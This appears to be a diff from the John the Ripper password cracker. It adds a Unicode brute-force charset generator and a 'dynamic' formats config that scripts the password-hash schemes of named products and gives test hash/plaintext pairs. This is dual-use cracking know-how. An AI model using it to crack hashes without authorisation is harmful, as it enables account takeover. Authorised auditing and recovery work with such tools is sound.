+	while (c <= 0x1d505)	// ..to MATHEMATICAL FRAKTUR CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d507;		// from MATHEMATICAL FRAKTUR CAPITAL D
+	while (c <= 0x1d50a)	// ..to MATHEMATICAL FRAKTUR CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d50d;		// from MATHEMATICAL FRAKTUR CAPITAL J
+	while (c <= 0x1d514)	// ..to MATHEMATICAL FRAKTUR CAPITAL Q
+		charset[i++] = c++;
+	c = 0x1d516;		// from MATHEMATICAL FRAKTUR CAPITAL S
+	while (c <= 0x1d51c)	// ..to MATHEMATICAL FRAKTUR CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d51e;		// from MATHEMATICAL FRAKTUR SMALL A
+	while (c <= 0x1d539)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL B
+		charset[i++] = c++;
+	c = 0x1d53b;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL D
+	while (c <= 0x1d53e)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL G
+		charset[i++] = c++;
+	c = 0x1d540;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL I
+	while (c <= 0x1d544)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL M
+		charset[i++] = c++;
+	c = 0x1d54a;		// from MATHEMATICAL DOUBLE-STRUCK CAPITAL S
+	while (c <= 0x1d550)	// ..to MATHEMATICAL DOUBLE-STRUCK CAPITAL Y
+		charset[i++] = c++;
+	c = 0x1d552;		// from MATHEMATICAL DOUBLE-STRUCK SMALL A
+	while (c <= 0x1d6a5)	// ..to MATHEMATICAL ITALIC SMALL DOTLESS J
+		charset[i++] = c++;
+	c = 0x1d6a8;		// from MATHEMATICAL BOLD CAPITAL ALPHA
+	while (c <= 0x1d7cb)	// ..to MATHEMATICAL BOLD SMALL DIGAMMA
+		charset[i++] = c++;
+	c = 0x1d7ce;		// from MATHEMATICAL BOLD DIGIT ZERO
+	while (c <= 0x1d7ff)	// ..to MATHEMATICAL MONOSPACE DIGIT NINE
+		charset[i++] = c++;
+// 1D800..1DAAF; Sutton SignWriting
+	c = 0x1d800;		// from SIGNWRITING HAND-FIST INDEX
+	while (c <= 0x1da8b)	// ..to SIGNWRITING PARENTHESIS
+		charset[i++] = c++;
+	c = 0x1da9b;		// from SIGNWRITING FILL MODIFIER-2
+	while (c <= 0x1da9f)	// ..to SIGNWRITING FILL MODIFIER-6
+		charset[i++] = c++;
+	c = 0x1daa1;		// from SIGNWRITING ROTATION MODIFIER-2
+	while (c <= 0x1daaf)	// ..to SIGNWRITING ROTATION MODIFIER-16
+		charset[i++] = c++;
+// 1E000..1E02F; Glagolitic Supplement
+	c = 0x1e000;		// from COMBINING GLAGOLITIC LETTER AZU
+	while (c <= 0x1e006)	// ..to COMBINING GLAGOLITIC LETTER ZHIVETE
+		charset[i++] = c++;
+	c = 0x1e008;		// from COMBINING GLAGOLITIC LETTER ZEMLJA
+	while (c <= 0x1e018)	// ..to COMBINING GLAGOLITIC LETTER HERU
+		charset[i++] = c++;
+	c = 0x1e01b;		// from COMBINING GLAGOLITIC LETTER SHTA
+	while (c <= 0x1e021)	// ..to COMBINING GLAGOLITIC LETTER YATI
+		charset[i++] = c++;
+	charset[i++] = 0x1e023;	// COMBINING GLAGOLITIC LETTER YU
+	charset[i++] = 0x1e024;	// COMBINING GLAGOLITIC LETTER SMALL YUS
+	c = 0x1e026;		// from COMBINING GLAGOLITIC LETTER YO
+	while (c <= 0x1e02a)	// ..to COMBINING GLAGOLITIC LETTER FITA
+		charset[i++] = c++;
+// 1E800..1E8DF; Mende Kikakui
+	c = 0x1e800;		// from MENDE KIKAKUI SYLLABLE M001 KI
+	while (c <= 0x1e8c4)	// ..to MENDE KIKAKUI SYLLABLE M060 NYON
+		charset[i++] = c++;
+	c = 0x1e8c7;		// from MENDE KIKAKUI DIGIT ONE
+	while (c <= 0x1e8d6)	// ..to MENDE KIKAKUI COMBINING NUMBER MILLIONS
+		charset[i++] = c++;
+// 1E900..1E95F; Adlam
+	c = 0x1e900;		// from ADLAM CAPITAL LETTER ALIF
+	while (c <= 0x1e94a)	// ..to ADLAM NUKTA
+		charset[i++] = c++;
+	c = 0x1e950;		// from ADLAM DIGIT ZERO
+	while (c <= 0x1e959)	// ..to ADLAM DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1e95e;	// ADLAM INITIAL EXCLAMATION MARK
+	charset[i++] = 0x1e95f;	// ADLAM INITIAL QUESTION MARK
+// 1EC70..1ECBF; Indic Siyaq Numbers
+	c = 0x1ec71;		// from INDIC SIYAQ NUMBER ONE
+	while (c <= 0x1ecb4)	// ..to INDIC SIYAQ ALTERNATE LAKH MARK
+		charset[i++] = c++;
+// 1EE00..1EEFF; Arabic Mathematical Alphabetic Symbols
+	c = 0x1ee00;		// from ARABIC MATHEMATICAL ALEF
+	while (c <= 0x1ee03)	// ..to ARABIC MATHEMATICAL DAL
+		charset[i++] = c++;
+	c = 0x1ee05;		// from ARABIC MATHEMATICAL WAW
+	while (c <= 0x1ee1f)	// ..to ARABIC MATHEMATICAL DOTLESS QAF
+		charset[i++] = c++;
+	charset[i++] = 0x1ee21;	// ARABIC MATHEMATICAL INITIAL BEH
+	charset[i++] = 0x1ee22;	// ARABIC MATHEMATICAL INITIAL JEEM
+	c = 0x1ee29;		// from ARABIC MATHEMATICAL INITIAL YEH
+	while (c <= 0x1ee32)	// ..to ARABIC MATHEMATICAL INITIAL QAF
+		charset[i++] = c++;
+	c = 0x1ee34;		// from ARABIC MATHEMATICAL INITIAL SHEEN
+	while (c <= 0x1ee37)	// ..to ARABIC MATHEMATICAL INITIAL KHAH
+		charset[i++] = c++;
+	charset[i++] = 0x1ee4d;	// ARABIC MATHEMATICAL TAILED NOON
+	charset[i++] = 0x1ee4f;	// ARABIC MATHEMATICAL TAILED AIN
+	charset[i++] = 0x1ee51;	// ARABIC MATHEMATICAL TAILED SAD
+	charset[i++] = 0x1ee52;	// ARABIC MATHEMATICAL TAILED QAF
+	charset[i++] = 0x1ee61;	// ARABIC MATHEMATICAL STRETCHED BEH
+	charset[i++] = 0x1ee62;	// ARABIC MATHEMATICAL STRETCHED JEEM
+	c = 0x1ee67;		// from ARABIC MATHEMATICAL STRETCHED HAH
+	while (c <= 0x1ee6a)	// ..to ARABIC MATHEMATICAL STRETCHED KAF
+		charset[i++] = c++;
+	c = 0x1ee6c;		// from ARABIC MATHEMATICAL STRETCHED MEEM
+	while (c <= 0x1ee72)	// ..to ARABIC MATHEMATICAL STRETCHED QAF
+		charset[i++] = c++;
+	c = 0x1ee74;		// from ARABIC MATHEMATICAL STRETCHED SHEEN
+	while (c <= 0x1ee77)	// ..to ARABIC MATHEMATICAL STRETCHED KHAH
+		charset[i++] = c++;
+	c = 0x1ee79;		// from ARABIC MATHEMATICAL STRETCHED DAD
+	while (c <= 0x1ee7c)	// ..to ARABIC MATHEMATICAL STRETCHED DOTLESS BEH
+		charset[i++] = c++;
+	c = 0x1ee80;		// from ARABIC MATHEMATICAL LOOPED ALEF
+	while (c <= 0x1ee89)	// ..to ARABIC MATHEMATICAL LOOPED YEH
+		charset[i++] = c++;
+	c = 0x1ee8b;		// from ARABIC MATHEMATICAL LOOPED LAM
+	while (c <= 0x1ee9b)	// ..to ARABIC MATHEMATICAL LOOPED GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eea1;	// ARABIC MATHEMATICAL DOUBLE-STRUCK BEH
+	charset[i++] = 0x1eea3;	// ARABIC MATHEMATICAL DOUBLE-STRUCK DAL
+	c = 0x1eea5;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK WAW
+	while (c <= 0x1eea9)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK YEH
+		charset[i++] = c++;
+	c = 0x1eeab;		// from ARABIC MATHEMATICAL DOUBLE-STRUCK LAM
+	while (c <= 0x1eebb)	// ..to ARABIC MATHEMATICAL DOUBLE-STRUCK GHAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1eef0;	// ARABIC MATHEMATICAL OPERATOR MEEM WITH HAH WITH TATWEEL
+	charset[i++] = 0x1eef1;	// ARABIC MATHEMATICAL OPERATOR HAH WITH DAL
+// 1F000..1F02F; Mahjong Tiles
+	c = 0x1f000;		// from MAHJONG TILE EAST WIND
+	while (c <= 0x1f02b)	// ..to MAHJONG TILE BACK
+		charset[i++] = c++;
+// 1F030..1F09F; Domino Tiles
+	c = 0x1f030;		// from DOMINO TILE HORIZONTAL BACK
+	while (c <= 0x1f093)	// ..to DOMINO TILE VERTICAL-06-06
+		charset[i++] = c++;
+// 1F0A0..1F0FF; Playing Cards
+	c = 0x1f0a0;		// from PLAYING CARD BACK
+	while (c <= 0x1f0ae)	// ..to PLAYING CARD KING OF SPADES
+		charset[i++] = c++;
+	c = 0x1f0b1;		// from PLAYING CARD ACE OF HEARTS
+	while (c <= 0x1f0bf)	// ..to PLAYING CARD RED JOKER
+		charset[i++] = c++;
+	c = 0x1f0c1;		// from PLAYING CARD ACE OF DIAMONDS
+	while (c <= 0x1f0cf)	// ..to PLAYING CARD BLACK JOKER
+		charset[i++] = c++;
+	c = 0x1f0d1;		// from PLAYING CARD ACE OF CLUBS
+	while (c <= 0x1f0f5)	// ..to PLAYING CARD TRUMP-21
+		charset[i++] = c++;
+// 1F100..1F1FF; Enclosed Alphanumeric Supplement
+	c = 0x1f100;		// from DIGIT ZERO FULL STOP
+	while (c <= 0x1f10c)	// ..to DINGBAT NEGATIVE CIRCLED SANS-SERIF DIGIT ZERO
+		charset[i++] = c++;
+	c = 0x1f110;		// from PARENTHESIZED LATIN CAPITAL LETTER A
+	while (c <= 0x1f16b)	// ..to RAISED MD SIGN
+		charset[i++] = c++;
+	c = 0x1f170;		// from NEGATIVE SQUARED LATIN CAPITAL LETTER A
+	while (c <= 0x1f1ac)	// ..to SQUARED VOD
+		charset[i++] = c++;
+	c = 0x1f1e6;		// from REGIONAL INDICATOR SYMBOL LETTER A
+	while (c <= 0x1f1ff)	// ..to REGIONAL INDICATOR SYMBOL LETTER Z
+		charset[i++] = c++;
+// 1F200..1F2FF; Enclosed Ideographic Supplement
+	charset[i++] = 0x1f200;	// SQUARE HIRAGANA HOKA
+	charset[i++] = 0x1f202;	// SQUARED KATAKANA SA
+	c = 0x1f210;		// from SQUARED CJK UNIFIED IDEOGRAPH-624B
+	while (c <= 0x1f23b)	// ..to SQUARED CJK UNIFIED IDEOGRAPH-914D
+		charset[i++] = c++;
+	c = 0x1f240;		// from TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-672C
+	while (c <= 0x1f248)	// ..to TORTOISE SHELL BRACKETED CJK UNIFIED IDEOGRAPH-6557
+		charset[i++] = c++;
+	charset[i++] = 0x1f250;	// CIRCLED IDEOGRAPH ADVANTAGE
+	charset[i++] = 0x1f251;	// CIRCLED IDEOGRAPH ACCEPT
+	c = 0x1f260;		// from ROUNDED SYMBOL FOR FU
+	while (c <= 0x1f265)	// ..to ROUNDED SYMBOL FOR CAI
+		charset[i++] = c++;
+// 1F300..1F5FF; Miscellaneous Symbols and Pictographs
+	c = 0x1f300;		// from CYCLONE
+	while (c <= 0x1f5ff)	// ..to MOYAI
+		charset[i++] = c++;
+// 1F600..1F64F; Emoticons
+	c = 0x1f600;		// from GRINNING FACE
+	while (c <= 0x1f64f)	// ..to PERSON WITH FOLDED HANDS
+		charset[i++] = c++;
+// 1F650..1F67F; Ornamental Dingbats
+	c = 0x1f650;		// from NORTH WEST POINTING LEAF
+	while (c <= 0x1f67f)	// ..to REVERSE CHECKER BOARD
+		charset[i++] = c++;
+// 1F680..1F6FF; Transport and Map Symbols
+	c = 0x1f680;		// from ROCKET
+	while (c <= 0x1f6d4)	// ..to PAGODA
+		charset[i++] = c++;
+	c = 0x1f6e0;		// from HAMMER AND WRENCH
+	while (c <= 0x1f6ec)	// ..to AIRPLANE ARRIVING
+		charset[i++] = c++;
+	c = 0x1f6f0;		// from SATELLITE
+	while (c <= 0x1f6f9)	// ..to SKATEBOARD
+		charset[i++] = c++;
+// 1F700..1F77F; Alchemical Symbols
+	c = 0x1f700;		// from ALCHEMICAL SYMBOL FOR QUINTESSENCE
+	while (c <= 0x1f773)	// ..to ALCHEMICAL SYMBOL FOR HALF OUNCE
+		charset[i++] = c++;
+// 1F780..1F7FF; Geometric Shapes Extended
+	c = 0x1f780;		// from BLACK LEFT-POINTING ISOSCELES RIGHT TRIANGLE
+	while (c <= 0x1f7d8)	// ..to NEGATIVE CIRCLED SQUARE
+		charset[i++] = c++;
+// 1F800..1F8FF; Supplemental Arrows-C
+	c = 0x1f800;		// from LEFTWARDS ARROW WITH SMALL TRIANGLE ARROWHEAD
+	while (c <= 0x1f80b)	// ..to DOWNWARDS ARROW WITH LARGE TRIANGLE ARROWHEAD
+		charset[i++] = c++;
+	c = 0x1f810;		// from LEFTWARDS ARROW WITH SMALL EQUILATERAL ARROWHEAD
+	while (c <= 0x1f847)	// ..to DOWNWARDS HEAVY ARROW
+		charset[i++] = c++;
+	c = 0x1f850;		// from LEFTWARDS SANS-SERIF ARROW
+	while (c <= 0x1f859)	// ..to UP DOWN SANS-SERIF ARROW
+		charset[i++] = c++;
+	c = 0x1f860;		// from WIDE-HEADED LEFTWARDS LIGHT BARB ARROW
+	while (c <= 0x1f887)	// ..to WIDE-HEADED SOUTH WEST VERY HEAVY BARB ARROW
+		charset[i++] = c++;
+	c = 0x1f890;		// from LEFTWARDS TRIANGLE ARROWHEAD
+	while (c <= 0x1f8ad)	// ..to WHITE ARROW SHAFT WIDTH TWO THIRDS
+		charset[i++] = c++;
+// 1F900..1F9FF; Supplemental Symbols and Pictographs
+	c = 0x1f900;		// from CIRCLED CROSS FORMEE WITH FOUR DOTS
+	while (c <= 0x1f90b)	// ..to DOWNWARD FACING NOTCHED HOOK WITH DOT
+		charset[i++] = c++;
+	c = 0x1f910;		// from ZIPPER-MOUTH FACE
+	while (c <= 0x1f93e)	// ..to HANDBALL
+		charset[i++] = c++;
+	c = 0x1f940;		// from WILTED FLOWER
+	while (c <= 0x1f970)	// ..to SMILING FACE WITH SMILING EYES AND THREE HEARTS
+		charset[i++] = c++;
+	c = 0x1f973;		// from FACE WITH PARTY HORN AND PARTY HAT
+	while (c <= 0x1f976)	// ..to FREEZING FACE
+		charset[i++] = c++;
+	c = 0x1f97c;		// from LAB COAT
+	while (c <= 0x1f9a2)	// ..to SWAN
+		charset[i++] = c++;
+	c = 0x1f9b0;		// from EMOJI COMPONENT RED HAIR
+	while (c <= 0x1f9b9)	// ..to SUPERVILLAIN
+		charset[i++] = c++;
+	charset[i++] = 0x1f9c0;	// CHEESE WEDGE
+	charset[i++] = 0x1f9c2;	// SALT SHAKER
+	c = 0x1f9d0;		// from FACE WITH MONOCLE
+	while (c <= 0x1f9ff)	// ..to NAZAR AMULET
+		charset[i++] = c++;
+// 1FA00..1FA6F; Chess Symbols
+	c = 0x1fa60;		// from XIANGQI RED GENERAL
+	while (c <= 0x1fa6d)	// ..to XIANGQI BLACK SOLDIER
+		charset[i++] = c++;
+// 20000..2A6DF; CJK Unified Ideographs Extension B
+	c = 0x20000;		// from <CJK Ideograph Extension B, First>
+	while (c <= 0x2a6d6)	// ..to <CJK Ideograph Extension B, Last>
+		charset[i++] = c++;
+// 2A700..2B73F; CJK Unified Ideographs Extension C
+	c = 0x2a700;		// from <CJK Ideograph Extension C, First>
+	while (c <= 0x2b734)	// ..to <CJK Ideograph Extension C, Last>
+		charset[i++] = c++;
+// 2B740..2B81F; CJK Unified Ideographs Extension D
+	c = 0x2b740;		// from <CJK Ideograph Extension D, First>
+	while (c <= 0x2b81d)	// ..to <CJK Ideograph Extension D, Last>
+		charset[i++] = c++;
+// 2B820..2CEAF; CJK Unified Ideographs Extension E
+	c = 0x2b820;		// from <CJK Ideograph Extension E, First>
+	while (c <= 0x2cea1)	// ..to <CJK Ideograph Extension E, Last>
+		charset[i++] = c++;
+// 2CEB0..2EBEF; CJK Unified Ideographs Extension F
+	c = 0x2ceb0;		// from <CJK Ideograph Extension F, First>
+	while (c <= 0x2ebe0)	// ..to <CJK Ideograph Extension F, Last>
+		charset[i++] = c++;
+// 2F800..2FA1F; CJK Compatibility Ideographs Supplement
+	c = 0x2f800;		// from CJK COMPATIBILITY IDEOGRAPH-2F800
+	while (c <= 0x2fa1d)	// ..to CJK COMPATIBILITY IDEOGRAPH-2FA1D
+		charset[i++] = c++;
+// E0000..E007F; Tags
+	c = 0xe0020;		// from TAG SPACE
+	while (c <= 0xe007f)	// ..to CANCEL TAG
+		charset[i++] = c++;
+// E0100..E01EF; Variation Selectors Supplement
+// F0000..FFFFF; Supplementary Private Use Area-A
+// 100000..10FFFF; Supplementary Private Use Area-B
+
+/* Zero-terminate it, and cache the first character */
+	charset[i] = 0;
+	c0 = charset[0];
+
+	last = minlength - 1;
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = -1;
+	word[i] = 0;
+
+/* We must init word with dummy data, it doesn't get set until filter() */
+	word = 1;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = charset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = charset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+	} else				// We're done
+		word = 0;
+}
+
+void restore()
+{
+	int i, c;
+
+	/* Calculate the current length and infer the character indices */
+	last = 0;
+	while (c = word[last]) {
+		i = 0; while (charset[i] != c && charset[i]) i++;
+		if (!charset[i]) i = 0;	// Not found
+		id[last++] = i;
+	}
+	lastid = id[--last];
+}
@@ -0,0 +1,1300 @@
+# Here are some examples of DYNAMIC.
+# Please refer to ./doc/DYNAMIC for documentation on how to set these up.
+# Format names up to dynamic_999 are reserved for builtin functions.
+
+####################################################################
+# here is a synopsis of the formats in this file.  Please keep this up to date
+####################################################################
+# dynamic_1001: md5(md5(md5(md5($p))))
+# dynamic_1002: md5(md5(md5(md5(md5($p)))))
+# dynamic_1003: md5(md5($p).md5($p))
+# dynamic_1004: md5(md5(md5(md5(md5(md5($p))))))
+# dynamic_1005: md5(md5(md5(md5(md5(md5(md5($p)))))))
+# dynamic_1006: md5(md5(md5(md5(md5(md5(md5(md5($p))))))))
+# dynamic_1007: md5(md5($p).$s) (vBulletin)
+# dynamic_1008: md5($p.$s) (RADIUS User-Password)
+# dynamic_1009: md5($s.$p) (RADIUS Responses)
+# dynamic_1010: md5($p null_padded_to_len_100) RAdmin v2.x MD5
+# dynamic_1011: md5($p.md5($s)) (webEdition CMS)
+# dynamic_1012: md5($p.md5($s)) (webEdition CMS)
+# dynamic_1013: md5($p.PMD5(username)) (webEdition CMS)
+# dynamic_1014: md5($p.$s) (long salt)
+# dynamic_1015: md5(md5($p.$u).$s) (PostgreSQL 'pass the hash')
+# dynamic_1016: md5($p.$s) (long salt)
+# dynamic_1017: md5($s.$p) (long salt)
+# dynamic_1018: md5(sha1(sha1($p)))
+# dynamic_1019: md5(sha1(sha1(md5($p))))
+# dynamic_1020: md5(sha1(md5($p)))
+# dynamic_1021: md5(sha1(md5(sha1($p))))
+# dynamic_1022: md5(sha1(md5(sha1(md5($p)))))
+# dynamic_1023: sha1($p) (hash truncated to length 32)
+# dynamic_1024: sha1(md5($p)) (hash truncated to length 32)
+# dynamic_1025: sha1(md5(md5($p))) (hash truncated to length 32)
+# dynamic_1026: sha1(sha1($p)) (hash truncated to length 32)
+# dynamic_1027: sha1(sha1(sha1($p))) (hash truncated to length 32)
+# dynamic_1028: sha1(sha1_raw($p)) (hash truncated to length 32)
+# dynamic_1029: sha256($p) (hash truncated to length 32)
+# dynamic_1030: whirlpool($p) (hash truncated to length 32)
+# dynamic_1031: gost($p) (hash truncated to length 32)
+# dynamic_1032: sha1_64(utf16($p)) (PeopleSoft)
+# dynamic_1033: sha1_64(utf16($p).$s)
+# dynamic_1034: md5($p.$u) (PostgreSQL MD5)
+# dynamic_1300: md5(md5_raw($p))
+# dynamic_1350: md5(md5($s.$p):$s)
+# dynamic_1400: sha1(utf16($p)) (Microsoft CREDHIST)
+# dynamic_1401: md5($u.\nskyper\n.$p) (Skype MD5)
+# dynamic_1501: sha1($s.sha1($p)) (Redmine)
+# dynamic_1502: sha1(sha1($p).$s) (XenForo SHA-1)
+# dynamic_1503: sha256(sha256($p).$s) (XenForo SHA-256)
+# dynamic_1504: sha1($s.$p.$s)
+# dynamic_1505: md5($p.$s.md5($p.$s))
+# dynamic_1506: md5($u.:XDB:.$p) (Oracle 12c "H" hash)
+# dynamic_1507: sha1(utf16($const.$p)) (Mcafee master pass)
+# dynamic_1518: md5(sha1($p).md5($p).sha1($p))
+# dynamic_1528: sha256($s.$p.$s) (Telegram for Android)
+# dynamic_1529: sha1($p null_padded_to_len_32) (DeepSound)
+# dynamic_1550: md5($u.:mongo:.$p) (MONGODB-CR system hash)
+# dynamic_1551: md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+# dynamic_1552: md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+# dynamic_1560: md5($s.$p.$s2) (SocialEngine)
+# dynamic_1588: sha256($s.sha1($p)) (ColdFusion 11)
+# dynamic_1590: sha1(utf16be(space_pad_10(uc($s)).$p)) (IBM AS/400 SHA1)
+# dynamic_1592: sha1($s.sha1($s.sha1($p))) (wbb3)
+# dynamic_1600: sha1($s.utf16le($p)) (Oracle PeopleSoft PS_TOKEN)
+# dynamic_1608: sha256(sha256_raw(sha256_raw($p))) (Neo Wallet)
+
+####################################################################
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^4  (i.e. 4 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1001]
+# expression shown will be the string:   dynamic_1001 md5(md5(md5(md5($p))))
+Expression=md5(md5(md5(md5($p))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+#if !ARCH_LITTLE_ENDIAN  // unfortunatly, we have no #define here, so we always have to call this function, in a script or they will fail on BE boxes :(
+Func=DynamicFunc__set_input2_len_32_cleartop
+#endif
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1001$57200e13b490d4ae47d5e19be026b057:test1
+Test=$dynamic_1001$c6cc44f9e7fb7efcde62ba2e627a49c6:thatsworking
+Test=$dynamic_1001$0ae9549604e539a249c1fa9f5e5fb73b:test3
+# TestM= will ONLY load in an MMX or SSE2 build of JtR.
+# TestF= will ONLY load in a non-MMX and nonSSE build (flat oSSL build, or generic)
+TestM=$dynamic_1001$94c59ab02fcd39f3ff9a4e553a4afcb6:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1001$a8b46c02f1680860622df837fa78c3e4:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^5  (i.e. 5 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1002]
+# expression shown will be the string:   dynamic_1002 md5(md5(md5(md5(md5($p)))))
+Expression=md5(md5(md5(md5(md5($p)))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 5 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1002$25de8cd0b0cf69c5b5bc19c8ee64adab:test1
+Test=$dynamic_1002$a0b535420ea47849f7c2cc09a3ad0ac3:thatsworking
+Test=$dynamic_1002$4cb029bd5b4ef79f785ca685caf17bf8:test3
+TestM=$dynamic_1002$5a791c6c9de2f488a8155f35900348b0:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1002$b8da59d26b6494df42b8c0f1fba8cd7e:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5(md5($p).md5($p))
+####################################################################
+[List.Generic:dynamic_1003]
+# expression shown will be the string:   dynamic_1003 md5(md5($p).md5($p))
+Expression=md5(md5($p).md5($p))
+# NOTE, this format does NOT work on SSE2.  It requires a md5() of a 64 byte string.
+# SSE (or MMX) is limtited to 54 byte max password, due to 'enhancements'
+# Thus, we need a non-sse2 safe flag.
+##JF Flag=MGF_NOTSSE2Safe
+##JF Flag=MGF_KEYS_INPUT
+##JF Flag=MGF_FULL_CLEAN_REQUIRED
+# here is the optimized 'script' to perform hash 'like' IPB but salt replaced with password.
+##JF Func=DynamicFunc__crypt_md5
+##JF Func=DynamicFunc__clean_input2_kwik
+##JF Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+##JF Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+##JF Func=DynamicFunc__crypt_md5_in2_to_out1
+
+# much more optimal.   From 1118k to 2155k on an SSE2 box.
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1
+Flag=MGF_POOR_OMP
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__append_input_from_input
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+
+# These are test strings for this format.
+Test=$dynamic_1003$478b10974f15e7295883224fd286ccba:test1
+Test=$dynamic_1003$18a59101e6c6fb38260d542a394ecb22:thatsworking
+Test=$dynamic_1003$630b01b68b6db6fd43a751f8147d1faf:test3
+Test=$dynamic_1003$2dbecd858c29d5602da78204af7dfe1b:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^6  (i.e. 6 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1004]
+# expression shown will be the string:   dynamic_1004 md5(md5(md5(md5(md5(md5($p))))))
+Expression=md5(md5(md5(md5(md5(md5($p))))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 6 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt_md5_in2_to_out1
+# These are test strings for this format.
+Test=$dynamic_1004$de1b991dd27fb9813e88b957a455dccd:test1
+Test=$dynamic_1004$6a62cd3c4d81139f61fb2553cdef0dc7:thatsworking
+Test=$dynamic_1004$a977990e521c5d1d17c6d65fdf2681b4:test3
+TestM=$dynamic_1004$e475d31b00626080fc01ca4832a33293:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1004$f60eca1ad34608b7c6b1b04379b3fee3:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+
+####################################################################
+# Simple DYNAMIC type for md5($p)^^7  (i.e. 7 steps of md5 recursively)
+####################################################################
+[List.Generic:dynamic_1005]
+# expression shown will be the string:   dynamic_1005 md5(md5(md5(md5(md5(md5(md5($p)))))))
+Expression=md5(md5(md5(md5(md5(md5(md5($p)))))))
+Flag=MGF_KEYS_INPUT
+Flag=MGF_SET_INP2LEN32
+MaxInputLen=55
+MaxInputLenX86=110
+# here is the optimized 'script' to perform the md5 7 times on itself.
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__overwrite_from_last_output_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
+Func=DynamicFunc__set_input2_len_32_cleartop
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__overwrite_from_last_output2_to_input2_as_base16_no_size_fix
